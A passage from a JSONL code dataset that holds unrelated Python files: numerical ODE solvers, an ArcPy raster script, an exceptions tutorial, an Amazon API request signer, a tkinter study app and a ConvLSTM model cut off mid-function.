fuscat1[feature_key][features[feature_key]]:\n fuscat1[feature_key][features[feature_key]][label] = 0.0\n fuscat1[feature_key][features[feature_key]][label] += int_one\n if label not in num_entries_per_category:\n num_entries_per_category[label] = 0.0\n num_entries_per_category[label] += int_one\n int_one = (int_one * float_one)\n\n\ndef reset(set_float_one=1.0):\n global int_one\n global float_one\n global num_entries_per_category\n global fuscat1\n num_entries_per_category = {}\n fuscat1 = {}\n int_one = 1\n float_one = set_float_one\n\nif (__name__ == '__main__'):\n train([1, 1], 1)\n train([0, 0], 2)\n #print predict([1, 1])\n","sub_path":"data_challenges/mbrdna_data_challenge/MBRDNA_MLPUX_InterviewChallenge/mnbayes.py","file_name":"mnbayes.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559764869","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n# Time complexity: O()\n# Space complexity: O()\n\n\nclass Solution:\n def splitArray(self, nums: List[int], m: int) -> int:\n\n def valid(mid):\n count = 1\n total = 0\n for num in nums:\n total += num\n if total > mid:\n total = num\n count += 1\n if count > m:\n return False\n return True\n\n low = max(nums)\n high = sum(nums)\n\n while low <= high:\n mid = (low + high) // 2\n if valid(mid):\n high = mid - 1\n else:\n low = mid + 1\n\n return low\n\n\n# https://leetcode.com/problems/split-array-largest-sum/discuss/141497/AC-Java-DFS-%2B-memorization\n# dp 做法\n# https://leetcode.com/problems/split-array-largest-sum/discuss/89821/Python-solution-dp-and-binary-search","sub_path":"leetcode_python/410.Split_Array_Largest_Sum.py","file_name":"410.Split_Array_Largest_Sum.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609790438","text":"import numpy as np;\nimport matplotlib.pyplot as plt;\nimport math;\nfrom scipy.optimize import fsolve;\nimport time\n#Setup functions to be used in script environment\nabs = lambda a : np.abs(a)\n\ndef orderOfDecade(decade,N,E):\n decade = int(decade)\n i = 
N.index(decade)\n j = 0;\n while N[j] < decade*10 : j += 1;\n return str(abs(round(math.log(E[j],10) - math.log(E[i],10),3)))\n\nf = lambda x : 1 / (1 + x) #Note is only a function of x\nsoln = lambda t: np.sqrt(4 + 2*t) - 1\nEmax = lambda x,t: np.max(abs(x - soln(t)))\nEend = lambda x,t: abs(x[-1] - soln(t[-1]))\n\n\n\ngp = lambda xn, delta : lambda xnplus1 : xn - xnplus1 + ( f(xn) + f(xnplus1) )*delta/2\ndef trapIter(xn,delta,guess=0):\n g = gp(xn,delta)\n return fsolve(g,guess)[0]\n\ndef TRAP(N):\n delta = 16/N\n t = np.arange(0,16+delta,delta)\n x = [1];\n while len(x) < len(t):\n x.append(trapIter(x[-1],delta,x[-1]))\n x = np.array(x);\n return (t,x,Emax(x,t),Eend(x,t));\n\n#RK Part\ndef RK4(N):\n delta = 16/N\n def __RK4(xn):\n z1 = f(xn)\n z2 = f(xn + z1*delta/2)\n z3 = f(xn + z2*delta/2)\n z4 = f(xn + z3*delta)\n return xn + (z1 + 2*z2 + 2*z3 + z4)*delta/6\n t = np.arange(0,16+delta,delta)\n x = [1];\n while len(x) < len(t):\n x.append(__RK4(x[-1]))\n x = np.array(x);\n return (t,x,Emax(x,t),Eend(x,t))\n\n\n\n\n\n\n\n\n#==================================================================================================\n#==================================================================================================\n\ndef plotRK4():\n N = [n*10**m for m in [2,3,4,5] for n in range(1,10)]\n N.append(1000000)\n Eendings = []\n Emaxes = []\n\n print(\"__RK4__\".center(40,'#'))\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = RK4(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\ndef plotTRAP():\n N = [n*10**m for m in [2,3,4,5] for n in range(1,10)]\n N = [N[i] for i in range(len(N)) if i % 2 == 0]\n N.append(1000000)\n Eendings = []\n Emaxes = []\n\n print(\"__TRAP__\".center(40,'#'))\n\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = TRAP(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\ndef plotMethod(method,everyOther=False):\n distribution = (1,2,4,6,8) if everyOther else (1,2,3,4,5,6,7,8,9)\n N = [n*10**m for m in [2,3,4,5] for n in distribution]\n N.append(1000000)\n\n Eendings = []\n Emaxes = []\n\n print(str(method).split(' ')[1].center(40,'#'))\n tics = [];\n try:\n tic = time.time()\n for n in N:\n (t,x,Emax,Eend) = method(n);\n print(\"n=\"+str(n)+\", time=\"+str(round(time.time() - tic,2)) + \"[s]\")\n tics.append(round(time.time() - tic,2))\n Eendings.append(Eend)\n Emaxes.append(Emax)\n except KeyboardInterrupt as ki:\n minlen = min([len(Eendings),len(Emaxes)])\n N = N[0:minlen]\n Eendings = Eendings[0:minlen]\n Emaxes = Emaxes[0:minlen]\n\n plt.plot(N,Emaxes,label=\"Emax O=\"+orderOfDecade(10**2,N,Emaxes))\n 
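# the O= labels estimate the order of accuracy: the drop in log10(error) across the first decade of N\n    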
plt.plot(N,Eendings,label=\"Eend O=\"+orderOfDecade(10**2,N,Eendings))\n plt.yscale('log')\n plt.xscale('log')\n plt.grid(True)\n plt.legend();\n plt.show()\n\n plt.cla();\n plt.clf();\n plt.plot(N,tics,'r-',label=\"iteration time in seconds\")\n plt.title(\"Iteration Time VS. N\")\n plt.ylabel('[sec]')\n plt.xlabel('discretization size')\n plt.legend();\n plt.grid(True);\n plt.show();\n\n","sub_path":"Homework/SEM2/02/src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181287982","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 09 14:32:00 2015\n\n@author: jroth\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 15:57:25 2015\n\n@author: jroth\n\"\"\"\n\ndef rasterMul(ras1, ras2, outRas):\n import os\n import arcpy\n from arcpy import env\n \n env.workspace = os.path.split(outRas)[0]\n arcpy.CheckOutExtension('Spatial')\n \n out = arcpy.sa.Times(ras1, ras2)\n #null = arcpy.sa.IsNull(out) \n #new = arcpy.sa.Con(null > 0, 0, out)\n out.save(outRas) \n\n\ndef ras2ascii(ras, asci):\n import arcpy\n# print os.path.sep(ras)\n# env.workspace = \n arcpy.RasterToASCII_conversion(ras, asci)\n \n \ndef delRas(ras):\n import arcpy\n arcpy.Delete_management(ras) \n \n\n\nimport os\nimport arcpy\nfrom arcpy import env \narcpy.CheckOutExtension(\"Spatial\")\ninDir = 'P:\\\\282\\\\model\\\\domain_runs\\\\1980-2011\\\\spatial_input\\\\lu'\noutDir = 'P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\lmb_lu'\n\n\ninpts = \"P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\5kptsAEA.shp\"\n\nprjFile = \"P:\\\\282\\\\gis\\\\Reeves_extracted_inputs\\\\outline.prj\"\n\nenv.workspace = outDir\n\n# get rasters to mask\nfiles = os.listdir(inDir)\nfor fyle in files:\n if fyle.endswith(\".asc\"):\n newAscii = os.path.join(outDir, fyle.split('.')[0]+\".asc\") # out ascii\n arcpy.CheckOutExtension(\"Spatial\") # checkout extension\n env.workspace = inDir # set workspace\n ras1 = arcpy.Raster(os.path.join(inDir, fyle)) # this is the raster we are extracting from\n newPts = os.path.join(outDir,fyle.split(\".\")[0]+\".shp\") # this is the new pt coverage we make \n arcpy.sa.ExtractValuesToPoints(inpts, ras1, newPts,\"NONE\", \"VALUE_ONLY\") # execute extraction\n \n repoPts = os.path.join(outDir,fyle.split(\".\")[0]+\"_rep.shp\")\n arcpy.Project_management(newPts, repoPts, prjFile)\n arcpy.Delete_management(newPts) \n outRas = os.path.join(os.path.split(newAscii)[0],os.path.split(newAscii)[1].split(\".\")[0][0:12])\n arcpy.PointToRaster_conversion(repoPts, \"RASTERVALU\", outRas, \"MEAN\", \"\", 5000)\n arcpy.Delete_management(repoPts) \n outSetNull = arcpy.sa.SetNull(outRas, outRas, \"VALUE < 0\")\n outSetNull.save(os.path.join(outDir,\"nullTemp\"))\n x = outSetNull.catalogPath\n arcpy.Delete_management(outRas) \n ras2ascii(outSetNull, newAscii)\n arcpy.Delete_management(outSetNull) ","sub_path":"ArcGIS/extractByPoint.py","file_name":"extractByPoint.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"125206940","text":"# Анна и Лолита играют в города.\r\n# Через N ходов Анна и Лолита забывают названные ими города. 
Вы\r\n# берете на себя тяжелую ношу - вам необходимо запоминать города в игре.\r\n\r\n\r\n# Формат ввода: Сначала идет число N (натуральное число) -\r\n# количество названных городов в игре.\r\n# Затем идет 15 строк - названия городов (гарантируется,\r\n# что все города различны).\r\n# После чего идет еще одна строка - новый город. \r\n\r\n\r\n# Вывод: \"OK\" - если такого города еще не было названо.\r\n# \"TRY ANOTHER\" - в противном случае.\r\n\r\n# 3\r\n# Москва\r\n# Верхние Кеки\r\n# Уфа\r\n# Ростов OK\r\n\r\n\r\n\r\ncities = set()\r\nfor _ in range(int(input())):\r\n cities.add(input())\r\nif input() in cities:\r\n print(\"TRY ANOTHER\")\r\nelse:\r\n print(\"OK\")","sub_path":"Lec_4_11.11/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356652968","text":"'''\r\nThe last except clause may omit the exception name(s), to serve as a wildcard. \r\nUse this with extreme caution, since it is easy to mask a real programming error in this way! \r\nIt can also be used to print an error message and then re-raise the exception \r\n(allowing a caller to handle the exception as well):\r\n'''\r\n\r\nimport sys\r\n\r\ntry:\r\n f = open('abc.txt')\r\n s = f.readline()\r\n i = int(s.strip())\r\n # raise TypeError\r\nexcept OSError as err:\r\n print(\"Os error : {0}\".format(err))\r\nexcept ValueError:\r\n print(\"Could not convert data to an integer.\")\r\nexcept:\r\n print(\"Unexpected error:\", sys.exc_info())\r\n # raise\r\n\r\n'''\r\nThe try … except statement has an optional else clause, which, when present, must follow all\r\n except clauses. It is useful for code that must be executed if the try clause does not \r\n raise an exception. For example:\r\n'''\r\nfor arg in sys.argv[1:]:\r\n try:\r\n # raise ValueError\r\n # f = open(arg, 'r')\r\n f = open('abc.txt', 'r')\r\n except OSError:\r\n print('cannot open', arg)\r\n else:\r\n print(arg, 'has', len(f.readlines()), 'lines')\r\n f.close()\r\n\r\n'''\r\nWhen an exception occurs, it may have an associated value, also known as the exception’s argument.\r\nThe presence and type of the argument depend on the exception type. The variable is bound to an \r\nexception instance with the arguments stored in instance.args.\r\n'''\r\n\r\ntry:\r\n raise Exception('arg1', 'arg2')\r\nexcept Exception as exp:\r\n print(type(exp)) # the exception instance\r\n print(exp.args) # arguments stored in .args\r\n print(exp) # __str__ allows args to be printed directly\r\n # but may be overridden in exception subclasses\r\n x, y = exp.args # unpack arguments\r\n print('X: ', x, ' and Y:', y)\r\n\r\n'''\r\nException handlers don’t just handle exceptions if they occur immediately in the try clause, \r\nbut also if they occur inside functions that are called (even indirectly) in the try clause.\r\nFor example:\r\n'''\r\n\r\n\r\ndef this_fail():\r\n x = 1 / 0\r\n\r\n\r\ntry:\r\n this_fail()\r\nexcept ZeroDivisionError as err:\r\n print('Handling run-time error:', err)\r\n\r\n'''\r\nThe raise statement allows the programmer to force a specified exception to occur. 
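The sole argument to raise must be an exception instance or an exception class (a class that derives from BaseException).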
\r\nFor example:\r\n'''\r\n\r\n# raise NameError('HiThere')\r\n# raise ValueError # shorthand for 'raise ValueError()'\r\n\r\n\r\n'''\r\nIf you need to determine whether an exception was raised but don’t intend to handle it, \r\na simpler form of the raise statement allows you to re-raise the exception:\r\n'''\r\ntry:\r\n raise NameError('HiThere')\r\nexcept NameError:\r\n print('An exception flew by!')\r\n #raise\r\n\r\n\r\n'''\r\nFinally:\r\n\r\nThe try statement has another optional clause which is intended to define clean-up actions that \r\nmust be executed under all circumstances. \r\n\r\nA finally clause is always executed before leaving the try statement, whether an exception has \r\noccurred or not.\r\n\r\nFor example:\r\n'''\r\n\r\ndef divide(x, y):\r\n try:\r\n result = x/y;\r\n except ZeroDivisionError:\r\n print('Division by zero!')\r\n else:\r\n print('Result is: ', result)\r\n finally:\r\n print(\"Executing finally clause.\")\r\n\r\ndivide(10, 3)\r\ndivide(2, 0)\r\ndivide('3','4')\r\n\r\n'''\r\nPredefined Clean-up Actions:\r\n\r\nThe problem with this code is that it leaves the file open for an indeterminate\r\namount of time after this part of the code has finished executing. \r\nfor line in open(\"myfile.txt\"):\r\n print(line, end=\"\")\r\n\r\n\r\nThe with statement allows objects like files to be used in a way that ensures they are always\r\ncleaned up promptly and correctly.\r\n\r\nwith open(\"myfile.txt\") as f:\r\n for line in f:\r\n print(line, end=\"\")\r\n'''\r\n\r\n","sub_path":"errors_exceptions/exception_error1.py","file_name":"exception_error1.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88760136","text":"from urllib.parse import quote, urlparse\nimport httplib2\nimport time\nimport hashlib, hmac\nimport base64\n\nclass Amazon:\n \n def __init__(self\n , cache_dir\n , secret_key\n , url\n , Version\n , AWSAccessKeyId\n , AssociateTag\n , Service\n , Operation\n , **default_req_params):\n self.__h = httplib2.Http(cache_dir) \n self.__secret_key = secret_key\n self.__amazon_url = url;\n self.__default_req_params = {'Version': Version\n , 'AWSAccessKeyId': AWSAccessKeyId\n , 'AssociateTag': AssociateTag\n , 'Service': Service\n , 'Operation': Operation}\n self.__default_req_params.update(default_req_params)\n\n def request(self, **req_params):\n return self.__h.request(self.get_request_url(**req_params))\n\n def get_request_url(self, **req_params):\n return self.__build_url(dict(self.__default_req_params, **req_params))\n\n def __build_url(self, req_params):\n req_params['Timestamp'] = time.strftime(\"%Y-%m-%dT%H:%M:%S.000Z\", time.gmtime())\n req_param_str = '&'.join((k + \"=\" + quote(req_params[k].encode('utf-8'),safe='~'))\n for k in sorted(req_params.keys()))\n uo = urlparse(self.__amazon_url)\n signature = quote(base64.b64encode(hmac.new(self.__secret_key.encode('ascii')\n , (\"GET\\n\" + uo.netloc + \"\\n\" + uo.path\n + \"\\n\" + req_param_str).encode('ascii')\n , hashlib.sha256).digest()))\n url = self.__amazon_url + \"?\" + req_param_str + \"&Signature=\" + signature \n return url\n\n","sub_path":"amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350363216","text":"import tkinter as tk\nimport os\nimport threading\n#import threading\n\n#big problem that I faced: I had a different file named threading.py that messed it all 
up\n\nrandom = tk.Tk() #random to emphasize that this can be anything\n\ndef colour_contrast():\n\trandom.configure(background=\"blue\")\n\t#btnNormal = tk.Button(random, text = \" Normal Mode \", command = colour_normal) #command = speechThread\n\t#btnNormal.configure(bg = \"red\")\n\t#btnNormal.grid(row = 8, column = 1, sticky = \"NESW\")\n\t#btnContrast.config(row = 8, column = 0, columnspan = 1, sticky = \"NESW\")\n\tbtnContrast.config(text=\"Normal Mode\", command = colour_normal)\n\t#textMYP.config(random, background=\"yellow\", height = 3, width = 20)\n\ttextCExp.config(state = \"disabled\")\n\ndef say_term():\n\tterm = var.get()\n\ttoSay = \"say \" + term\n\tos.system(toSay)\n\nrandom.configure(background=\"light blue\")\n\ndef colour_normal():\n\trandom.configure(background=\"light blue\")\n\tbtnContrast.config(text=\"Contrast Mode\", command = colour_contrast)\n\ndef speechThread():\n\tt = threading.Thread(target = speech)\n\tt.start()\n\ndef colour_blue():\n\trandom.configure(background=\"light blue\")\n\n\ndef speech():\n\tos.system(\"say Select an MYP term\")\n\ndef change(*args):\n\t#Since every definition starts with the name of the command term. \n\t#always followed by a :\n\t#Step 1: \n\t#store the var term in a temp variable called term\n\tterm = var.get() #Analyse\n\n\t#Loop through the list definitions and pull out all the character before the :\n\t#When I find the value matches term I will print to the Text box\n\t\n\n\tdefinitions = {\n\t\t\"Select\": \"\", #clears everything // make sure to add comma (this was a problem I fell into while developing the code)\n\t\t\"Analyse\": \"Definition for Analyse\",\n\t\t\"Apply\": \"Definition for Apply\",\n\t\t\"Annotate\": \"Definition for Annotate\",\n\n\n\t}\n\n\tclarExplanation = {\n\t\t\"Select\": \"\", #clears everything\n\t\t\"Analyse\": \"Explanation for Analyse\",\n\t\t\"Apply\": \"Explanation for Apply\",\n\t\t\"Annotate\": \"Explanation for Annotate\",\n\t}\n\n\tquestionlevel = {\n\t\t\"Select\": \"\",\n\t\t\"Analyse\": \"Level for Analyse\",\n\t\t\"Apply\": \"Level for Apply\",\n\t\t\"Annotate\": \"Level for Annotate\",\n\t}\n\t#reason why this is not ideal is because it would be hard to add several different terms when i fully develop the idea\n\ttextMYP.config(state = \"normal\") #allowing for the text box to be editable\n\ttextMYP.delete(\"1.0\",tk.END) #deletes everything in the box\n\ttextMYP.insert(\"1.0\",definitions.get(term)) #python3 dictionaries - Looks up term in definitions{}, then returns what's beside it\n\ttextMYP.config(state = \"disabled\") #makes the text box not-editable once again\n\n\n\ttextCExp.config(state = \"normal\")\n\ttextCExp.delete(\"1.0\",tk.END)\n\ttextCExp.insert(\"1.0\",clarExplanation.get(term))\n\ttextCExp.config(state = \"disabled\")\n\n\ttextQLevel.config(state = \"normal\")\n\ttextQLevel.delete(\"1.0\",tk.END)\n\ttextQLevel.insert(\"1.0\",questionlevel.get(term))\n\ttextQLevel.config(state = \"disabled\")\n\n\n\n\n\t#for i in range(0,len(definitions),1):\n\t#\tcolLoc = definitions[i].index(\":\")\n\t##\tif (cterm == term):\n\t#\t\ttextMYP.config(state = \"normal\")\n\t#\t\ttextMYP.delete(\"1.0\",tk.END)\n\t#\t\ttextMYP.insert(\"1.0\",definitions[i])\n\t#\t\ttextMYP.config(state = \"disabled\")\n\t\n#definitions = [\n#\t\"Analyse:\\ndefinition1\\n\",\n#\t\"Apply:\\ndefinition2\\n\",\n#\t\"Annotate:\\ndefinition3\\n\"\n\n#\n\n\n\n#_____________________________________________\n\nlabMYP = tk.Label(random, text = \"MYP Term:\", background=\"light blue\")\n\nlabMYP.grid(pady = 
(0,0), row = 0, column = 0, sticky = \"NESW\")\n\n#____________________________________________\n\n\n\n#_____________________________________________\n\nCOMMANDTERM = [\n\t\"Select\",\n\t\"Analyse\",\n\t\"Annotate\",\n\t\"Apply\"\n]\n\nvar = tk.StringVar() #Special variable that holds what is in the drop down\nvar.set(COMMANDTERM[0])\nvar.trace(\"w\", change)\n\ndropDown = tk.OptionMenu(random, var, COMMANDTERM[0],COMMANDTERM[1],COMMANDTERM[2],COMMANDTERM[3])\ndropDown.grid(row = 1, column = 0, columnspan = 2, sticky = \"NESW\", pady = 10)\n\n#_____________________________________________\n\nbtnContrast = tk.Button(random, text = \"Contrast Mode\", foreground = \"black\", background = \"light blue\", command = colour_contrast) #command = speechThread\nbtnContrast.configure(bg = \"red\")\nbtnContrast.grid(row = 11, column = 0, columnspan = 2, sticky = \"NESW\")\n\n\t#if colour_red == True:\n\t#\tbtnNormal = tk.Button(random, text = \"Normal Mode\", command = colour_normal) #command = speechThread\n\t#\tbtnNormal.configure(bg = \"red\")\n\t#\tbtnNormal.grid(row = 0, column = 0)\n\n#_____________________________________________\n\nbtnEnter = tk.Button(random, text = \"Speech\", command = speechThread, bg=\"khaki1\") #command = speechThread\nbtnEnter.grid(row = 0, column = 1)\n\n#_____________________________________________\n\n\nlabTerm = tk.Label(random, text = \"Term:\", background=\"light blue\")\n\nlabTerm.grid(row = 2, column = 0, columnspan = 2, pady = (0,10))\n\n#_________________________________________________\n\ntextTerm = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextTerm.config(state = \"disabled\")\n\ntextTerm.grid(row = 3, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#____________________________________________\n\n\n\n#_____________________________________________\n\nlabIB = tk.Label(random, text = \"IB Definition:\", background=\"light blue\")\n\nlabIB.grid(row = 4, column = 0, columnspan = 2, pady = (0,10))\n\n#_____________________________________________\n\nbtnSAY = tk.Button(random, text = \"Term\", command = say_term)\n\nbtnSAY.grid(row = 4, column = 1, pady = (0,10))\n\n#____________________________________________\n\ntextMYP = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextMYP.config(state = \"disabled\")\n\ntextMYP.grid(row = 6, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#___________________________________________\n\nlabCE = tk.Label(random, text = \"Clarified Explanation:\", background=\"light blue\")\n\nlabCE.grid(row = 7, column = 0, pady = (0,10))\n\n#_____________________________________________\ndef onclick():\n\t\tmsg = \"How we got our definition?\\n\"\n\n\t\tmsg1 = \"Students here at UCC were asked to... 
\"\n\n\t\tpopup = tk.Tk()\n\n\t\tpopup.wm_title(\"!\")\n\t\tlabel = tk.Label(popup, text = msg, font = (\"Arial\", 16), background = \"light blue\")\n\t\tlabel1 = tk.Label(popup, text = msg1, font = (\"Arial\", 12), background = \"light blue\")\n\t\tlabel.pack(side = \"top\", fill = \"x\")\n\t\tlabel1.pack(side = \"top\", fill = \"x\")\n\t\tB1 = tk.Button(popup, text = \"Back\", command = popup.destroy, background = \"light blue\")\n\t\tB1.pack()\n\t\tpopup.mainloop()\n\nbtnInfo = tk.Button(random, text = \"Info\", command = lambda: onclick())\n\nbtnInfo.grid(pady = (0,10), row = 7, column = 1, columnspan = 1, sticky = \"NESW\")\n\n\n\n\n#____________________________________________\n\ntextCExp = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextCExp.config(state = \"disabled\")\n\ntextCExp.grid(row = 8, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#____________________________________________\n\nlabLV = tk.Label(random, text = \"Level of Question seen in:\", background = \"light blue\")\n\nlabLV.grid(row = 9, column = 0, columnspan = 2, pady = (0,10))\n\n#____________________________________________\n\ntextQLevel = tk.Text(random, background=\"light grey\", height = 3, width = 20)\ntextQLevel.config(state = \"disabled\")\n\ntextQLevel.grid(row = 10, column = 0, columnspan = 2, sticky = \"NESW\")\n\n#_____________________________________________\n\n#textSpace = tk.Text(random, background=\"light blue\", height = 3, width = 20)\n#textSpace.config(state = \"disabled\")\n\n#textSpace.grid(row = 9, column = 0, columnspan = 2, sticky = \"NESW\", pady = (0,10))\n\n#______________________________________________\n\nrandom.mainloop()\n\n#Basic:\n#1: Contruct\n#2: Configure\n#3: Pack\n\n#btn.Enter = tk.Button(random, text = \"Search\")\n\n#btn.Enter.pack()\n\n#******* allows for people on the internet (using a JSON) to add an example of a question with the command term in it (also add this as a text box / output)\n#I'd like to add colour to the background of my ","sub_path":"stepsForTranslator/TERMMypcalculator.py","file_name":"TERMMypcalculator.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114482309","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as f\n\nclass ConvLSTMCell(nn.Module):\n def __init__(self, input_channels, hidden_channels, kernel_size):\n super(ConvLSTMCell, self).__init__()\n\n # assert hidden_channels % 2 == 0\n\n self.input_channels = input_channels\n self.hidden_channels = hidden_channels\n self.kernel_size = kernel_size\n self.num_features = 4\n\n self.padding = int((kernel_size - 1) / 2)\n\n self.Wxi = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whi = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxf = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whf = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxc = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n self.Whc = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n self.Wxo = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)\n 
self.Who = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)\n\n self.Wci = None\n self.Wcf = None\n self.Wco = None\n\n def forward(self, x, h, c):\n ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)\n cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)\n cc = cf * c + ci * torch.relu(self.Wxc(x) + self.Whc(h))\n co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)\n ch = co * torch.relu(cc)\n return ch, cc\n\n def init_hidden(self, batch_size, hidden, shape):\n\n if self.Wci is None:\n self.Wci = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n self.Wcf = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n self.Wco = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()\n else:\n assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'\n assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'\n\n return (Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda(),\n Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda())\n\n\nclass ConvLSTM(nn.Module):\n def __init__(self, input_channels, hidden_channels, kernel_size, frame_size, n_filters, hidden_size, device, step=1): #, effective_step=[1]\n super(ConvLSTM, self).__init__()\n self.frame_size = frame_size\n self.hidden_size = hidden_size\n self.n_filters = n_filters\n self.device = device\n self.input_channels = [input_channels] + hidden_channels\n self.hidden_channels = hidden_channels\n self.kernel_size = kernel_size\n self.num_layers = len(hidden_channels)\n self.step = step\n\n self.cnn_before_lstm = nn.Sequential()\n self.cnn_before_lstm.add_module('conv0', nn.Conv2d(666, 256, 5, 1, 2))\n self.cnn_before_lstm.add_module('batchnorm0', nn.BatchNorm2d(256))\n self.cnn_before_lstm.add_module('relu0', nn.ReLU())\n self.cnn_before_lstm.add_module('conv1', nn.Conv2d(256, 128, 5, 1, 2))\n self.cnn_before_lstm.add_module('batchnorm1', nn.BatchNorm2d(128))\n\n self.cnn_after_lstm = nn.Sequential()\n self.cnn_after_lstm.add_module('conv2', nn.Conv2d(64, 32, 3, 1, 1))\n self.cnn_after_lstm.add_module('batchnorm2', nn.BatchNorm2d(32))\n self.cnn_after_lstm.add_module('relu2', nn.ReLU())\n self.cnn_after_lstm.add_module('conv3', nn.Conv2d(32, 1, 3, 1, 1))\n\n self.cnn_meas = nn.Sequential()\n self.cnn_meas.add_module('conv4', nn.Conv2d(1, 256, 3, 1, 1))\n self.cnn_meas.add_module('batchnorm4', nn.BatchNorm2d(256))\n self.cnn_meas.add_module('relu4', nn.ReLU())\n self.cnn_meas.add_module('conv5', nn.Conv2d(256, 666, 1, 1, 0))\n self.cnn_meas.add_module('batchnorm5', nn.BatchNorm2d(666, affine=False))\n\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0.)\n\n self._all_layers = []\n name = 'cell0'\n cell = ConvLSTMCell(128, 64, 3)\n setattr(self, name, cell)\n self._all_layers.append(cell)\n self.gamma = nn.Parameter(torch.zeros(1))\n\n def forward(self, image, phi_0):\n internal_state = []\n batch_size, seq_len, width, height = image.size()\n output_seq = Variable(torch.zeros(batch_size, seq_len, width, height)).cuda()\n\n phi_t = f.normalize(phi_0, p=2, dim=1)\n for step in range(self.step):\n image_t = image[:, step, :]\n\n y_t = torch.sum(image_t[:, None, :, :] * phi_t, dim=(2, 3))\n x_1 = y_t[:, :, None, None] * phi_t\n x = self.cnn_before_lstm(x_1)\n\n for i in range(self.num_layers): ## If you use more than one layer\n # All cells are initialized in the first step\n name = 'cell{}'.format(i)\n if step == 0:\n 
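# states are built lazily on the first step, once the post-CNN spatial size is known\n                    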
